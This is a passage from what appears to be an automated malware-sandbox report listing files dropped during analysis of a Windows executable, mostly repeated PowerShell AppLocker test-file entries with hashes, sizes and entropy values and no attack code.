                                                                                                Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):25
                                                                                                Entropy (8bit):4.163856189774723
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:zCheECj:zChhQ
                                                                                                MD5:457BCBEA190F22248B3DE296E7F9CEE7
                                                                                                SHA1:0B93BCF7DA400D1844CF00B0FC4F2CF3AE0743C0
                                                                                                SHA-256:56BD2DD5A963BA3914E2FEC0C04FF9275581101D7554EC9D9DD47A7AC70F562B
                                                                                                SHA-512:F7A1C3792F9321B54447D6A67F21B48A5E6AEC243CA9A0EBEE2A0BF58E375E86BFC8583ACD9E53116EB2FE443E165B81CE63F6CD278F7C357D404E475A38570D
                                                                                                Malicious:false
                                                                                                Preview:CzKgKAx06tobJqCcItsgp0YIl
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
